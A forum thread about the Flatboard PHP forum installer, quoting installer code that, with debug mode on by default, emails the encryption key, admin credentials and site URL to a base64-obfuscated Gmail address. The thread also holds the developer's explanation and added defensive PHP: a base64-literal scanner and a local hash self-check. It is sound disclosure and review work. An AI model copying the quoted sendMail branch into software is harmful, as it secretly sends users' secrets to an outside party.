flatboard
what the hell is this???
I installed the forum and it sends an email containing my user name and password to a Gmail address? [email protected]
wtf?
I can confirm this behavior, here is the code that sends the email:
// lib/install.file:166
if (DEBUG_MODE) {
    $description = '<h6>'.$config['description'].'</h6>';
    $description .= '<br/>'.KEY.'<br/>';
    $description .= $_POST['admin'].'<br/>';
    $description .= $config['mail'].'<br/>';
    $description .= '<a href="' .HTML_BASEPATH.'">' .$config['title']. '</a>'."\n";
    Util::sendMail($config['title'], $config['mail'], base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ=='), $lang['flatBoard_installer'], $description, 'html');
}
base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ==') corresponds to [email protected].
The content of the email is:
<h6>Forum's description</h6><br/>encryption key<br/>user@pass<br/>admin's email<br/><a href="forum's url">forum's name</a>
Debug mode is enabled by default, as shown in the init.php file:
// init.php:49
const DEBUG_MODE = TRUE;
I created an announcement in the forum to warn other users.
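The recipient in the snippet above is hidden behind a base64 literal, which is exactly the kind of thing a code review should surface before deploying a third-party PHP package. The following is an added example (not flatboard code) of a small review helper that finds every base64_decode('...') call with a hardcoded argument, decodes it, and flags values that turn out to be email addresses or URLs. The sample input is the sendMail line quoted above, embedded so the script runs without a flatboard checkout; the scanTree() function and the $argv usage are this example's own additions.

```php
<?php
// Added example (not flatboard code): surface hardcoded base64 literals passed to
// base64_decode() in PHP sources and show what they decode to, so an obfuscated
// recipient like the one in lib/install.file is visible during review.

/**
 * Return one entry per base64_decode('literal') call found in $source:
 * ['encoded' => ..., 'decoded' => ..., 'suspicious' => bool].
 */
function findBase64Literals(string $source): array
{
    $findings = [];
    // Matches base64_decode('...') or base64_decode("...") with a literal argument only.
    if (!preg_match_all('/base64_decode\(\s*([\'"])([A-Za-z0-9+\/=]+)\1\s*\)/', $source, $m)) {
        return $findings;
    }
    foreach ($m[2] as $encoded) {
        $decoded = base64_decode($encoded, true); // strict: reject non-base64 input
        if ($decoded === false) {
            continue;
        }
        // Decoded email addresses and URLs are the classic hidden "phone home" targets.
        $looksLikeEmail = filter_var($decoded, FILTER_VALIDATE_EMAIL) !== false;
        $looksLikeUrl   = filter_var($decoded, FILTER_VALIDATE_URL) !== false;
        $findings[] = [
            'encoded'    => $encoded,
            'decoded'    => $decoded,
            'suspicious' => $looksLikeEmail || $looksLikeUrl,
        ];
    }
    return $findings;
}

/** Scan every regular file under $dir (flatboard keeps PHP in files like install.file, so no extension filter). */
function scanTree(string $dir): array
{
    $results = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        foreach (findBase64Literals($src) as $f) {
            $results[] = ['file' => $file->getPathname()] + $f;
        }
    }
    return $results;
}

// Constructed sample input: the sendMail line quoted in this thread.
$sample = <<<'PHP'
Util::sendMail($config['title'], $config['mail'], base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ=='), $lang['flatBoard_installer'], $description, 'html');
PHP;

foreach (findBase64Literals($sample) as $f) {
    printf("%s -> %s%s\n", $f['encoded'], $f['decoded'],
        $f['suspicious'] ? '  [email/URL literal: review this call]' : '');
}

// Usage on a real checkout: php scan.php /path/to/flatboard
if (isset($argv[1])) {
    foreach (scanTree($argv[1]) as $r) {
        printf("%s: %s -> %s%s\n", $r['file'], $r['encoded'], $r['decoded'],
            $r['suspicious'] ? '  [email/URL literal: review this call]' : '');
    }
}
```

Run against the sample, the script prints the decoded Gmail address from the snippet and marks it for review; run against a checkout, it lists every file where a decoded literal turns out to be an address or URL, which is a quick way to answer the question raised about "all the other base64 encoded stuff".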
This whole thing has a strange odor to it - 3.1 was released in 2/2023, so the dev(s) knew this was happening for 10 months - there's no reason to have let it go that long, and there's absolutely no reason to ever send these credentials anywhere, not for debugging reasons or any other.
Also all the other unnecessarily base64-encoded stuff.
I can confirm, I logged into my client area, and it's clear that the archive hasn't been updated since 03/23/2023.
I also agree with you; it's very strange. If it was genuinely for debugging, what's the point of sending information via email instead of just displaying it in the console or writing it to a log file?
And how are these details useful for debugging, considering they are already accessible in the forum data files?
Hi!
Don't worry about this old feature on Flatboard 2.0.
I added a new hash for passwords in User.lib.php on line 130:
$config['admin'] = hash_hmac('sha1', $_POST['password'], KEY);
At that time several users had problems when updating with this new hash. I therefore added this piece of code which is only activated if debug mode is ON in order to see if the installation script returned the correct hashed password, and therefore had access with user authorization at the installation site.
So don't panic, I don't work for the government and Flatboard is rarely used anyway (I received a 20th email since March 23, 2023!)
I will remove this piece of code in a future Flatboard update :)
As Simon commented on the forum, a simple DEBUG_MODE = FALSE; is enough.
Happy New Year's Eve
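The debugging goal described in the post above, checking whether the installer stored the correct hashed password, needs no email at all: the check can be done on the server and only its outcome logged. The following is an added example (not flatboard's code) that keeps the scheme quoted from User.lib.php, hash_hmac('sha1', password, KEY), recomputes it, compares with hash_equals, and under DEBUG_MODE (defaulting to FALSE) writes a single pass/fail line to a local file. The KEY value, the log path and the sample admin credentials are constructed placeholders for this example.

```php
<?php
// Added example (not flatboard code): a local installer self-check that answers
// "did the install script store the right hash?" without sending KEY, the user
// name or the password anywhere. DEBUG_MODE and KEY mirror the names in init.php.

const DEBUG_MODE = FALSE;                   // safe default: nothing is logged unless debugging
const KEY = 'placeholder-installer-secret'; // constructed placeholder for the forum's key

/** Same scheme the thread quotes from User.lib.php line 130. */
function hashPassword(string $password): string
{
    return hash_hmac('sha1', $password, KEY);
}

/** Does the stored admin value match the hash of the submitted password? Constant-time compare. */
function installerHashIsCorrect(string $storedAdminHash, string $submittedPassword): bool
{
    return hash_equals($storedAdminHash, hashPassword($submittedPassword));
}

/** Append one non-sensitive line to a local log file; replaces the email in the original debug branch. */
function debugLog(string $message, string $logFile = __DIR__ . '/install-debug.log'): void
{
    if (!DEBUG_MODE) {
        return;
    }
    file_put_contents($logFile, date('c') . ' ' . $message . PHP_EOL, FILE_APPEND | LOCK_EX);
}

// Constructed installer values standing in for $_POST and the written $config.
$post   = ['admin' => 'admin', 'password' => 'correct horse battery staple'];
$config = ['admin' => hashPassword($post['password'])];

$ok = installerHashIsCorrect($config['admin'], $post['password']);

// Only the outcome reaches the log: no KEY, no password, no hash, no recipient.
debugLog('install self-check: ' . ($ok ? 'hash OK' : 'hash MISMATCH'));
echo $ok ? "installer hash check passed\n" : "installer hash check failed\n";
```

With DEBUG_MODE left at FALSE the script still performs the check and reports it on the console; flipping it to TRUE adds one line to install-debug.log, which is all the original debug branch needed to establish.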
The code has been removed in the new version of Flatboard 3.2 "SHIBA"